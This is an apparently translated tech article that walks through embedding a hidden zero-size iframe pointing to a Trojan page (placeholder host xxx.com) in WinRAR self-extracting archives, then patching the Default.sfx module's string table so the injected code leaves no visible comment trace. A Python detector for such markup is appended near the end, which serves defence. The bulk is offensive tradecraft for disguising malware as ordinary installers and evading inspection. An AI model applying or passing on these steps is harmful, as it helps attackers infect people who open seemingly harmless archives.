Source: Zhongguancun Online author: Zhang Qi
Compressed archives are among the most common file types. They are everywhere, whether as ordinary software distributions or as archives carrying Trojans, and naturally the most common file type is the one a malware distributor prefers to spread. However, simply planting a Trojan inside an ordinary archive is a somewhat dated method. Today we analyze a new idea for spreading Trojans through WinRAR archives.
I. Advantages of combining WinRAR with a Trojan
As everyone knows, WinRAR can create an EXE self-extracting (SFX) file so that users who do not have WinRAR installed can still unpack the archive. Self-extracting files created by WinRAR are very common, and many software packages use them as installers. When creating a self-extracting file with WinRAR you can also customize the self-extracting interface, displaying arbitrary text or images while the archive unpacks. This interface can be redefined so that the target is made to execute a webpage Trojan before extraction even begins.
II. A simple test
First, we need to create a WinRAR self-extracting file. Pack any resources, such as a few images or music files, into a RAR archive. Open the archive in WinRAR and click the "SFX" button on the toolbar to open the self-extracting file creation dialog. Select the "Default.sfx" module under "SFX module" and click the "Advanced SFX options" button to open the "Advanced SFX options" dialog. Switch to the "Text and icon" tab. Any text entered in the "Text to display in SFX window" area below is shown in the self-extracting interface. If we enter webpage code there, will it be executed?
In the text input area, enter the following code:
<script>alert("nethack")</script>
This snippet is commonly used to test for cross-site scripting: if the vulnerability exists, the page pops up an alert box. Now double-click the self-extracting file to see whether the test code runs. When the self-extracting file opens, the alert box appears, showing that the webpage code was executed.
So the WinRAR self-extracting interface renders embedded HTML and script. By modifying the test code we can make the self-extracting file display any webpage when it is opened, including a Trojan page, which turns WinRAR's self-extracting files into a vehicle for webpage Trojans.
III. Self-extracting files that load a webpage Trojan
Now we create a WinRAR self-extracting file that carries a webpage Trojan. First, prepare a webpage Trojan and upload it to some web space; assume its URL is http://www.xxx.com/01.htm. Create the self-extracting file in the same way as above, but enter the following code in the text box:
<iframe width="0" height="0" src="http://www.xxx.com/01.htm"></iframe>
This code displays a frame 0 pixels wide and 0 pixels high, that is, an invisible frame, whose content is the specified Trojan page. After confirming, the Trojan-carrying WinRAR self-extracting file is created. For the demonstration here, however, we change the statement to:
<iframe width="800" height="800" src="http://www.baidu.com"></iframe>
This displays a frame with a side of 300, and the page shown in it is the Baidu homepage. Double-click the WinRAR self-extracting file to which we added the code: the Baidu page appears in the self-extracting window, so the injection works. If the code is replaced with a real Trojan statement, the self-extracting interface shows a blank page while the hidden Trojan page is loaded without any visible sign of attack.
IV. Weaknesses of the Trojan-carrying self-extracting package
Although a WinRAR self-extracting Trojan made this way shows no symptoms while it runs, it still has defects. First, when the code hides the Trojan frame, the Trojan page is not displayed, but the window is blank and the default prompt text is missing. Second, every self-extracting file that contains script gains a "Comment" tab in its file properties, and this is true even for self-extracting files without any attack code. Right-click the self-extracting file just created, choose "Properties" from the context menu, and open the "Comment" tab: the Trojan code entered when the archive was created in self-extracting format is exposed there.
V. Hiding the Trojan more thoroughly
So how can the comment information of a Trojan-carrying self-extracting package be hidden more completely? In fact, the "Comment" information of a self-extracting file comes from WinRAR's "Default.sfx" self-extracting module. We can modify this module directly so that the self-extracting file no longer displays the "Comment" information.
Find the module file "Default.sfx" in the WinRAR installation directory. Before modifying it, check it with PEiD: the file is packed with UPX, and it can simply be unpacked with UPX Shell.
Download and install the eXeScope resource editor and open the "Default.sfx" file with it. In the tree on the left, expand "Resource" > "String table" > "10" > "Chinese (China)". The strings numbered 150 to 155 listed on the right are the text shown in the self-extracting window of a default self-extracting file. Each string may be at most 250 English characters long. We can modify these strings to hide the Trojan code; append the following code to the end of string 155:
<iframe width="800" height="800" src="http://www.baidu.com"></iframe>
After the modification, close eXeScope and save the updated "Default.sfx" file. From then on, a WinRAR self-extracting file can be created directly, without adding any Trojan code, and the Trojan page (Figure 11) is displayed automatically in the self-extracting window. The "Comment" tab no longer appears in the file properties, so the "Comment" information is hidden. If the width and height of the Trojan frame are set to 0, the self-extracting interface shows the default text such as "Click the Install button to start extraction......".
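Whether the markup is typed into the archive comment or patched into the Default.sfx string table, it still sits in the resulting executable as text, so a defender can find it by scanning the file in both single-byte and UTF-16LE views (Win32 string-table resources are UTF-16LE). The following Python checker is an added example, not code from the original article; the sample bytes are constructed, not a real executable, and example.invalid is a placeholder URL.

```python
import re
from typing import List, Tuple

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
# Markup that has no legitimate place in an SFX window text or an archive comment.
SUSPICIOUS = ("<script", "<iframe", "<object", "<embed", "javascript:")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)

def is_rar_sfx(data: bytes) -> bool:
    """True for a PE image (MZ header) that carries a RAR4 or RAR5 archive after it."""
    return data[:2] == b"MZ" and (RAR4_SIG in data or RAR5_SIG in data)

def _text_views(data: bytes) -> List[Tuple[str, str]]:
    """Decode the blob as single-byte text and as UTF-16LE at both byte alignments,
    since a patched Default.sfx keeps its window text in a UTF-16LE string table."""
    views = [("latin-1", data.decode("latin-1"))]
    for start in (0, 1):
        views.append((f"utf-16-le@{start}", data[start:].decode("utf-16-le", errors="ignore")))
    return views

def find_markup(data: bytes) -> List[Tuple[str, str]]:
    """Return (marker, view) pairs for every suspicious tag present in any text view."""
    hits = []
    for view, text in _text_views(data):
        low = text.lower()
        hits.extend((m, view) for m in SUSPICIOUS if m in low)
    return hits

def _attr(attrs: str, name: str) -> str:
    m = re.search(name + r'\s*=\s*"?\s*([^\s">]+)', attrs, re.IGNORECASE)
    return m.group(1) if m else ""

def hidden_frames(data: bytes) -> List[str]:
    """src values of <iframe> tags sized 0x0: a page loaded with nothing visible."""
    urls = []
    for _, text in _text_views(data):
        for m in IFRAME_RE.finditer(text):
            attrs = m.group(1)
            if _attr(attrs, "width") == "0" and _attr(attrs, "height") == "0":
                urls.append(_attr(attrs, "src"))
    return urls

# Constructed sample: fake MZ stub, a UTF-16LE string carrying a 0x0 frame, RAR4 signature.
SAMPLE = (b"MZ" + b"\x00" * 62
          + '<iframe width = 0 height = 0 src ="http://example.invalid/01.htm"></iframe>'.encode("utf-16-le")
          + RAR4_SIG + b"\x00" * 16)
CLEAN = b"MZ" + b"\x00" * 62 + "Click the Install button to start extraction".encode("utf-16-le") + RAR4_SIG

if __name__ == "__main__":
    print(is_rar_sfx(SAMPLE), find_markup(SAMPLE), hidden_frames(SAMPLE))
```

Run it over every executable in a download or mail-gateway quarantine: a hit from find_markup on a file that is_rar_sfx identifies as a RAR self-extractor is worth a manual look, and hidden_frames gives the URL to block.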
In this way a near-perfect WinRAR self-extracting Trojan is created. Can you tell how it differs from an ordinary self-extracting file?